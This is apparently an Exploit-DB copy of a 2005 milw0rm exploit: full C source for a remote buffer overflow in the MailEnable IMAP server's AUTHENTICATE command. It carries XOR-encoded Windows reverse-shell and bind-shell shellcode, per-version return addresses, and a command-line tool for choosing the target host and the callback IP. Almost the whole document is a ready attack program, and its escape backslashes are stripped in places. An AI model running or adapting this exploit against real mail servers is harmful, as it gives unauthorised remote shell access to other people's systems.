https://www.exploit-db.com/exploits/915

漏洞细节尚未披露

/*
      +--=[--------------------------x0n3-h4ck Team Presents---------------------------]=--+
      +--=[                                                                            ]=--+
      +--=[ MailEnable (Enterprise <= 1.04)(Professional <= 1.54) remote Imapd exploit ]=--+
      +--=[                                                                            ]=--+
      +--=[  Bug discovered by..: Corryl    ([email protected])                       ]=--+
      +--=[  Exploit coded by...: Expanders ([email protected])                      ]=--+
      +--=[                                                       wwww.x0n3-h4ck.org   ]=--+
      +--=[----------------------------------------------------------------------------]=--+
      
      Personal greetz goes to: crash-x for some code from his Cyrus Imapd sploit
                               cybertronic for reverse shellcode
                               K-C0d3r for coding support
                               x0n3-h4ck.org Members and Friends
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>

/*
Connectback Shellcode ::: 316 byte
Link points:
     Ip  : [111] unsigned long  (xored 0x99999999)
     Port: [118] unsigned short (xored 0x9999)
*/

unsigned char reverse_sc[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";

/*
Portbind Shellcode ::: 492 byte
Link points:
     Port: [266] unsigned short (xored 0x8888)
*/
unsigned char portbind_sc[] = 
"x90x90x90x90x90x90x90x90"
"xEBx03x5DxEBx05xE8xF8xFF"
"xFFxFFx8BxC5x83xC0x11x33xC9x66xB9xC9x01x80x30x88" 
"x40xE2xFAxDDx03x64x03x7Cx09x64x08x88x88x88x60xC4" 
"x89x88x88x01xCEx74x77xFEx74xE0x06xC6x86x64x60xD9" 
"x89x88x88x01xCEx4ExE0xBBxBAx88x88xE0xFFxFBxBAxD7" 
"xDCx77xDEx4Ex01xCEx70x77xFEx74xE0x25x51x8Dx46x60"
"xB8x89x88x88x01xCEx5Ax77xFEx74xE0xFAx76x3Bx9Ex60" 
"xA8x89x88x88x01xCEx46x77xFEx74xE0x67x46x68xE8x60" 
"x98x89x88x88x01xCEx42x77xFEx70xE0x43x65x74xB3x60" 
"x88x89x88x88x01xCEx7Cx77xFEx70xE0x51x81x7Dx25x60" 
"x78x88x88x88x01xCEx78x77xFEx70xE0x2Cx92xF8x4Fx60" 
"x68x88x88x88x01xCEx64x77xFEx70xE0x2Cx25xA6x61x60" 
"x58x88x88x88x01xCEx60x77xFEx70xE0x6DxC1x0ExC1x60" 
"x48x88x88x88x01xCEx6Ax77xFEx70xE0x6FxF1x4ExF1x60" 
"x38x88x88x88x01xCEx5ExBBx77x09x64x7Cx89x88x88xDC" 
"xE0x89x89x88x88x77xDEx7CxD8xD8xD8xD8xC8xD8xC8xD8" 
"x77xDEx78x03x50xDFxDFxE0x8Ax88xABx6Fx03x44xE2x9E" 
"xD9xDBx77xDEx64xDFxDBx77xDEx60xBBx77xDFxD9xDBx77" 
"xDEx6Ax03x58x01xCEx36xE0xEBxE5xECx88x01xEEx4Ax0B" 
"x4Cx24x05xB4xACxBBx48xBBx41x08x49x9Dx23x6Ax75x4E" 
"xCCxACx98xCCx76xCCxACxB5x01xDCxACxC0x01xDCxACxC4" 
"x01xDCxACxD8x05xCCxACx98xDCxD8xD9xD9xD9xC9xD9xC1" 
"xD9xD9x77xFEx4AxD9x77xDEx46x03x44xE2x77x77xB9x77" 
"xDEx5Ax03x40x77xFEx36x77xDEx5Ex63x16x77xDEx9CxDE"
"xECx29xB8x88x88x88x03xC8x84x03xF8x94x25x03xC8x80" 
"xD6x4Ax8Cx88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03" 
"xDCx8DxF0x8Bx5Dx03xC2x90x03xD2xA8x8Bx55x6BxBAxC1" 
"x03xBCx03x8Bx7DxBBx77x74xBBx48x24xB2x4CxFCx8Fx49" 
"x47x85x8Bx70x63x7AxB3xF4xACx9CxFDx69x03xD2xACx8B" 
"x55xEEx03x84xC3x03xD2x94x8Bx55x03x8Cx03x8Bx4Dx63"
"x8AxBBx48x03x5DxD7xD6xD5xD3x4Ax8Cx88";


int make_bindshell(int port);
int make_reverseshell(char *ip, char *port);
void help(char *program_name);


struct vuln{char *platform;char *retloc;char *ecxloc;} targets[]= {
    { "Windows   2003 - M. E. Enterprise", "xECxDAx07x01", "xE4xDAx07x01",  },
    { "Windows   2003 - M. E. Professional", "xECxDAx08x01", "xE4xDAx08x01", },
    { "Windows 2k Sp4 - M. E. Enterprise", "x80xE3x69x01", "x78xE3x69x01", },
    { "Windows 2k Sp4 - M. E. Professional", "x80xE3x6Ax01", "x78xE3x6Ax01", },
    { "Windows XP Sp2 - M. E. Enterprise", "xF4x22x19x01", "xECx22x19x01", },
    { "Windows XP Sp2 - M. E. Professional", "xF4x22xB2x00", "xECx22xB2x00", },
    { "Windows XP Sp1 - M. E. Enterprise", "xF4x22x03x01", "xECx22x03x01", },
    { "Windows XP Sp1 - M. E. Professional", "xE8xDAx02x01", "xE0xDAx02x01", },
    { NULL }
};

int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
    long addr;
    unsigned short port;
    unsigned long ip;
    int sockfd, buff,rc,opt,i;
    int target=0,rport=143,lport=7320;
    char *host=NULL,*lhost=NULL,*cbport;
    char evilbuf[2048];
    char buffer[1024];
    char *request;
    if(argc < 3 ) {
	help(argv[0]);
	exit(0);
    }
    while ((opt = getopt (argc, argv, "h:p:t:b:r:")) != -1){
          switch (opt){
	        case 'h':
	            host = optarg;
	            break;
	        case 'p':
                rport = atoi(optarg);
                if(rport > 65535 || rport < 1){
                    printf("[-] Port %d is invalidn",rport);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                for(i = 0; targets[i].platform; i++);
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?n");
                    help(argv[0]);
                }
                break;
            case 'b':
                lport = atoi(optarg);
                cbport = optarg;
                if(lport > 65535 || lport < 1){
                    printf("[-] Port %d is invalidn",lport);
                    return 1;
                }
                break;
            case 'r':
                lhost = optarg;
                break;
            default:
                help(argv[0]);
        }
    }
    
    if(host == NULL)
        help(argv[0]);

    printf("nn-=[ MailEnable Imapd remote exploit ::: Coded by Expanders ]=-n");
    he = gethostbyname(host);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(rport);
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '', 8);
    printf("nn[-] Targeting: %sn",targets[target].platform);
    if ( lhost != NULL )
       printf("[-] Reverse Shell on %s:%dnn",lhost,lport);
    else
       printf("[-] Bind Shell on %s:%dnn",host,lport);
    printf("[-]Connecting to target   t...");
    rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if(rc==0) {
              printf("[Done]n[-]Building evil buffer   t...");
              memset(evilbuf,'A',1016);
              memcpy(evilbuf+1016,targets[target].ecxloc,4);;
              memset(evilbuf+1020,'A',2);
              memcpy(evilbuf+1022,targets[target].ecxloc,4);
              memcpy(evilbuf+1026,targets[target].retloc,4);
              memset(evilbuf+1030,0x90,4);
              if ( lhost == NULL) {
                 make_bindshell(lport);
                 memcpy(evilbuf+1034,portbind_sc,sizeof(portbind_sc));
              } else {
                make_reverseshell(lhost,cbport);
                memcpy(evilbuf+1034,reverse_sc,sizeof(reverse_sc));
              }
              printf("[Done]n[-]Sending evil request   t...");
              sprintf(request,"A001 AUTHENTICATE %srn",evilbuf);
              send(sockfd,request,strlen(request),0);
              buff=recv(sockfd, buffer, 256, 0);
              if ( lhost == NULL)
                 printf("[Done]nn[------Now-telnet-(%s %d)------]nn",host,lport);
              else
                 printf("[Done]nn[------Now-wait-reverse-on-port-%d------]nn",lport);
    }
    else
              printf("[Fail] -> Unable to connectnn");
    close(sockfd);
    return 0;
}

int make_bindshell(int port) {
   port = htons(port^(unsigned short)0x8888);
   memcpy(&portbind_sc[266], &port, 2);
}

int make_reverseshell(char *ip, char *port) {
    unsigned long xorip;
    unsigned short xorport;
    xorip = inet_addr(ip)^(unsigned long)0x99999999;
    xorport = htons(atoi( port )^(unsigned short)0x9999);
    memcpy ( &reverse_sc[111], &xorip, 4);
    memcpy ( &reverse_sc[118], &xorport, 2);
}
void help(char *program_name) {
  int i;
  printf("nt-=[  Mail Enable Pro & Enterprise Imapd Remote Exploit  ]=-n");
  printf("t-=[                  www.x0n3-h4ck.org                  ]=-n");
  printf("t-=[    Discovered by CorryL     Coded by Expanders      ]=-nn");
  printf("Usage: %s -h <Host> [parameters]nn",program_name);
  printf("Parameters:n");
  printf("tt-h <host>   : Host to attackn");
  printf("tt-p <port>   : Imapd Port (Default 143)n");
  printf("tt-t <target> : Target type (Default 0)n");
  printf("tt-b <port>   : Bind or reverse shell port (Default 7320)n");
  printf("tt-r <host>   : Local ip for reverse shelln");
  printf("Target List:n");
  for(i = 0; targets[i].platform; i++)
        printf("tt%dt %sn", i, targets[i].platform);
}

// milw0rm.com [2005-04-05]